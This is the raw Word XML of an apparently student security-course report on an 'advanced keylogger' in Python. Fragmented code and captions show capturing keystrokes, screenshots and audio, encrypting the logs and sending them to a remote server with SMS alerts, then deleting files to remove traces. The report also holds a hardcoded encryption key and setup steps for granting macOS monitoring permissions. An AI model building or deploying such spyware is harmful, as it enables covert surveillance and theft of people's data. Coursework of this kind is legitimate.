        <w:t>f.write</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="008000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(" ")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521CA62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) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301E076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0B0E8B8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480A973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</w:p>
    <w:p w14:paraId="59584AD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2B3CBC0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#Encryption of files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5405434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8F327F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53508CB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5433107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encrypting_file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460C543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rb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208974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read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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA066F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A9A17D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490BF4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wb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0063D5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"Encrypted data files created to be sent :"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])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6CF25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099365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"Encrypted data :"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0C584E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#Send an SMS to say that the encrypted files are sent to the data server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4489B7E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messages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14:paraId="726165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create</w:t>
      </w:r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</w:p>
    <w:p w14:paraId="1D8D078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body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'Encrypted files sent to the server! Login to your account to access!'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4665B94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from_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'+12512209380'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4780C0D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to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'+61402821360'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3172C3D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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD09AE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"Message ID"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FD34A7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77DB7F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3AABE9E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#Clean up any tracks of activity done from system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7038E7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delete_files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521DEBB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delete_files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60E8809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 xml:space="preserve">"Removing trace of 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file:"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29A8BD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os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remove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EEF298A" w14:textId="77777777" w:rsidR="009E3509" w:rsidRPr="008A59D5" w:rsidRDefault="009E3509" w:rsidP="00E6398F">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="345B1906" w14:textId="7A7891BA" w:rsidR="009E3509" w:rsidRPr="008A59D5" w:rsidRDefault="00D85D91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encryptionkey.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FD1F7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77AC6A8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#Generate fernet key that will be used to decrypt ciphertext</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C80E82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generate_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key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685647A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Keylogger/encryption-decryption/encryption_key.txt"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wb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108A43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38FDEA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68BE23B6" w14:textId="77777777" w:rsidR="00D85D91" w:rsidRPr="008A59D5" w:rsidRDefault="00D85D91" w:rsidP="00E6398F">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="270" w:lineRule="atLeast"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A7064CB" w14:textId="1F5DCB6C" w:rsidR="00D85D91" w:rsidRPr="008A59D5" w:rsidRDefault="00D85D91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decryptionfiles.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0626A62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13C154F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#Use encryption key that is generated in encryption_key.txt for decryption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE5CBB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"w4eLP7fMuJwYoRJyqbpfkn2LSQNWYiDNy2KooG26SSE="</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC6187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#Encrypted file paths</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A511A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'/Users/van/Documents/UNSW/Courses/Year 1/Y1 Term 3/COMP6441 - Security Engineering/UNSW-T3-COMP6441/Assignments/Final Deliverable/Advanced Keylogger/e_systeminfo.txt'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A302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'/Users/van/Documents/UNSW/Courses/Year 1/Y1 Term 3/COMP6441 - Security Engineering/UNSW-T3-COMP6441/Assignments/Final Deliverable/Advanced Keylogger/e_key_log.txt'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A938A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3BEF27E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60D9819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decrypting_files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134E113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rb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4F7592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read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22FAE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900B82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BA48AA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Keylogger/decryption.txt"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'ab'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267F92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9CDB71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98658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3E342DD3" w14:textId="77777777" w:rsidR="003E58CB" w:rsidRDefault="003E58CB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98658"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CCEAD60" w14:textId="77777777" w:rsidR="00EE4615" w:rsidRDefault="003E58CB" w:rsidP="003E58CB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA18E7">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>NOTE:</w:t>
      </w:r>
      <w:r w:rsidRPr="003E58CB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4944E0CD" w14:textId="77777777" w:rsidR="00EE4615" w:rsidRDefault="003E58CB" w:rsidP="00EE4615">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE4615">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Enable the following settings on your Mac OS device before running the programs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD05731" w14:textId="77777777" w:rsidR="00EE4615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lastRenderedPageBreak/>
        <w:t>Accessibility</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5DEA18" w14:textId="77777777" w:rsidR="00EE4615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t>Input Monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04AC106A" w14:textId="542436FA" w:rsidR="003E58CB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t>Screen Recording</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B17793B" w14:textId="446890CD" w:rsidR="00EE4615" w:rsidRPr="00EE4615" w:rsidRDefault="00EE4615" w:rsidP="00EE4615">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12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Do a pip install of all the libraries mentioned in the import statements in keylogger.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A711091" w14:textId="121900F1" w:rsidR="00B93F64" w:rsidRDefault="00B93F64" w:rsidP="00E6398F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc149301458"/>
      <w:r w:rsidRPr="008A59D5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Outputs</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="7DFB2CCC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48E83680" wp14:editId="5178FC3E">
            <wp:extent cx="5731510" cy="3727450"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="130568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88155" name="Picture 13056881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D8B" w14:textId="1FC146DA" w:rsidR="00D30129" w:rsidRDefault="00D30129" w:rsidP="00D30129">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc149301545"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="00983598">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Generation of encryption key</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="4F11163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ED5B411" wp14:editId="1326C5A5">
            <wp:extent cx="5731510" cy="3727450"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="2066406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06524" name="Picture 20664065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FC83" w14:textId="1D762E77" w:rsidR="00D30129" w:rsidRDefault="00D30129" w:rsidP="00D30129">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc149301546"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="00983598">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Pasting the key in keylogger.py.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="55DFF0A6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6B6C2636" wp14:editId="04A6EEE0">
            <wp:extent cx="5731510" cy="3727450"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="1231256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56772" name="Picture 12312567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D4B" w14:textId="520A9DFC" w:rsidR="00D30129" w:rsidRDefault="00D30129" w:rsidP="00D30129">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc149301547"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="00983598">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>5</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Pasting the key in decryptionfiles.py.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="019CC4CC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2CBC207E" wp14:editId="691924D5">
            <wp:extent cx="5731510" cy="3727450"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="1271467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67390" name="Picture 12714673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985" w14:textId="132F9ACD" w:rsidR="00D30129" w:rsidRDefault="00D30129" w:rsidP="00D30129">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc149301548"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="00983598">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>6</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: syseminfo.txt file</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="6A955B03" w14:textId="1578ACB9" w:rsidR="00D30129" w:rsidRDefault="00D30129" w:rsidP="00D3012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C0511C" wp14:editId="2BFF3AE9">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>8589645</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1524000" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="12065"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="453804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EA31B" w14:textId="634ACF77" w:rsidR="00D30129" w:rsidRPr="00D30BA0" w:rsidRDefault="00D30129" w:rsidP="00D30129">
                            <w:pPr>
                              <w:pStyle w:val="Caption"/>
                              <w:rPr>
                                <w:noProof/>
                                <w:lang w:eastAsia="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:t xml:space="preserve">Figure </w:t>
                            </w:r>
                            <w:r w:rsidR="00AB790F">
                              <w:t>14</w:t>
                            </w:r>
                            <w:r>
                              <w:t>: audio.wav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C0511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676.35pt;width:120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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="44FEA31B" w14:textId="634ACF77" w:rsidR="00D30129" w:rsidRPr="00D30BA0" w:rsidRDefault="00D30129" w:rsidP="00D30129">
                      <w:pPr>
                        <w:pStyle w:val="Caption"/>
                        <w:rPr>
                          <w:noProof/>
                          <w:lang w:eastAsia="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:t xml:space="preserve">Figure </w:t>
                      </w:r>
                      <w:r w:rsidR="00AB790F">
                        <w:t>14</w:t>
                      </w:r>
                      <w:r>
                        <w:t>: audio.wav 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US"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="443EB6C5" wp14:editId="68270B90">
            <wp:extent cx="5731510" cy="3727450"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="13374179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7941" name="Picture 13374179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6F98" w14:textId="1CD4F7E9" w:rsidR="00D30129" w:rsidRDefault="00D30129" w:rsidP="00D30129">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc149301549"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="00983598">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>7</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: screenshot.png file</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="16B671E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4A1ED9F0" wp14:editId="060D07DF">
            <wp:extent cx="5731510" cy="3727450"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="190560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06909" name="Picture 1905606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0B3" w14:textId="6CEBC7F3" w:rsidR="00D30129" w:rsidRDefault="00D30129" w:rsidP="00D30129">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc149301550"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="00983598">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>8</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: key_log.txt file</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="3F8B2413" w14:textId="40B8C650" w:rsidR="00D30129" w:rsidRDefault="00AB790F" w:rsidP="00D30129">
      <w:pPr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63DE03B7" wp14:editId="44B2BBF0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731510" cy="698500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="2927804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80442" name="Picture 292780442" descr="movie::/Users/van/Documents/UNSW/Courses/Year 1/Y1 Term 3/COMP6441 - Security Engineering/UNSW-T3-COMP6441/Assignments/Final Deliverable/Advanced Keylogger/audio.wav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26BDE7" w14:textId="77777777" w:rsidR="00D30129" w:rsidRDefault="00D30129" w:rsidP="00D30129">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CD9B88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FAB572D" wp14:editId="56293618">
            <wp:extent cx="5731510" cy="3727450"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="1820988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8824" name="Picture 18209888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C6D6" w14:textId="1749D915" w:rsidR="00D30129" w:rsidRDefault="00D30129" w:rsidP="00D30129">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc149301551"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="00983598">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>9</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>: Encrypted key_log.txt file</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="7388E6DF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6B3C4F82" wp14:editId="3FC3D0AC">
            <wp:extent cx="5731510" cy="3727450"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="346617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17952" name="Picture 3466179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558" w14:textId="00D815A7" w:rsidR="00D30129" w:rsidRDefault="00D30129" w:rsidP="00D30129">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc149301552"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="00983598">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>10</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Encrypted syseminfo.txt file</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="06027E86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63CF88E" wp14:editId="22DE287C">
            <wp:extent cx="5731510" cy="3727450"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="14925618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61844" name="Picture 14925618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8124" w14:textId="20CE5DAD" w:rsidR="00D30129" w:rsidRDefault="00D30129" w:rsidP="00D30129">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc149301553"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="00983598">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>11</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Decrypted contents of key_logs.txt and syseminfo.txt</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="3999CD4C" w14:textId="77777777" w:rsidR="000C76EE" w:rsidRDefault="000C76EE" w:rsidP="000C76EE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54E86D11" wp14:editId="3A8750EB">
            <wp:extent cx="5731510" cy="3727450"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="975672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618" name="Picture 9756726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7D17" w14:textId="4C55CD43" w:rsidR="000C76EE" w:rsidRDefault="000C76EE" w:rsidP="000C76EE">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc149301554"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="00983598">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>12</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Clean-up of generated files in directory</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="69C4E7D3" w14:textId="77777777" w:rsidR="000C76EE" w:rsidRDefault="000C76EE" w:rsidP="000C76EE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5BC5A75D" wp14:editId="52132123">
            <wp:extent cx="4096385" cy="8863330"/>
            <wp:effectExtent l="0" t="0" r="5715" b="1270"/>
            <wp:docPr id="4819434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43492" name="Picture 4819434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4371" w14:textId="2FD3B8B0" w:rsidR="000C76EE" w:rsidRPr="000C76EE" w:rsidRDefault="000C76EE" w:rsidP="000C76EE">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc149301555"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="00983598">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>13</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Twilio SMS notifications for encrypted file contents of key_logs.txt and syseminfo.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> sent to remote server</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="6A07A40E" w14:textId="16109D12" w:rsidR="007E38A6" w:rsidRDefault="007E38A6" w:rsidP="007E38A6">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc149301459"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Appendix</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w14:paraId="14896E31" w14:textId="0699B721" w:rsidR="000813DC" w:rsidRDefault="000813DC" w:rsidP="00870BB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GitHub Link</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId23" w:history="1">
        <w:r w:rsidRPr="000813DC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          </w:rPr>
          <w:t>https://github.com/vandana0608/Van-s-Advanced-Keylogger</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="42862C01" w14:textId="3EC7DD81" w:rsidR="00870BB8" w:rsidRDefault="00870BB8" w:rsidP="00870BB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Audio File:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316284B2" w14:textId="08D68160" w:rsidR="00870BB8" w:rsidRPr="00870BB8" w:rsidRDefault="00870BB8" w:rsidP="00870BB8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00870BB8">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Audio.wav</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EE071B" w14:textId="65E6999F" w:rsidR="00CB23E2" w:rsidRDefault="007E38A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Code Files</w:t>
      </w:r>
      <w:r w:rsidR="00635494">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14AAF98B" w14:textId="05CAC275" w:rsidR="00983207" w:rsidRPr="00983207" w:rsidRDefault="00983207" w:rsidP="00983207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  <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00983207">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>keylogger.</w:t>
      </w:r>
      <w:r w:rsidR="00635494">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD416AC" w14:textId="6FBC6529" w:rsidR="00983207" w:rsidRDefault="00983207" w:rsidP="00983207">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00983207">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>encryption-decryption folder</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00635494">
        <w:t>that should contain</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26768FCA" w14:textId="47B539D3" w:rsidR="00983207" w:rsidRDefault="00983207" w:rsidP="00983207">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00983207">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>encryptionkey.</w:t>
      </w:r>
      <w:r w:rsidR="00635494">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>py -</w:t>
      </w:r>
      <w:r>
        <w:t>&gt; Generate encryption key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586526E0" w14:textId="1090C757" w:rsidR="00983207" w:rsidRDefault="00D0680D" w:rsidP="00983207">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00983207">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="00983207" w:rsidRPr="00983207">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>ecryptionfiles</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00635494">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>py</w:t>
      </w:r>
      <w:r w:rsidR="00983207">
        <w:t xml:space="preserve"> -&gt; Decrypt encrypted files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4615BB9F" w14:textId="26651A37" w:rsidR="000813DC" w:rsidRPr="00983207" w:rsidRDefault="000813DC" w:rsidP="000813DC"/>
    <w:sectPr w:rsidR="000813DC" w:rsidRPr="00983207" w:rsidSect="0032334C">
      <w:headerReference w:type="default" r:id="rId24"/>
      <w:footerReference w:type="even" r:id="rId25"/>
      <w:footerReference w:type="default" r:id="rId2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D8012" w14:textId="77777777" w:rsidR="00DE56A7" w:rsidRDefault="00DE56A7" w:rsidP="0032334C">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4E73F809" w14:textId="77777777" w:rsidR="00DE56A7" w:rsidRDefault="00DE56A7" w:rsidP="00323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4979644"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtContent>
      <w:p w14:paraId="4CEF4F21" w14:textId="1E13D920" w:rsidR="0032334C" w:rsidRDefault="0032334C" w:rsidP="0031016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1C56C9" w14:textId="77777777" w:rsidR="0032334C" w:rsidRDefault="0032334C" w:rsidP="0032334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55874256"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtContent>
      <w:p w14:paraId="6FB58052" w14:textId="5F0AE8A2" w:rsidR="0032334C" w:rsidRDefault="0032334C" w:rsidP="0031016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4A0949" w14:textId="0CC40AEC" w:rsidR="0032334C" w:rsidRDefault="0032334C" w:rsidP="0032334C">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:ind w:right="360"/>
    </w:pPr>
    <w:r>
      <w:t>Vandana Rao Emaneni (Z5451278)</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="5467F8DA" w14:textId="77777777" w:rsidR="0032334C" w:rsidRDefault="003233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4FD76F" w14:textId="77777777" w:rsidR="00DE56A7" w:rsidRDefault="00DE56A7" w:rsidP="0032334C">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
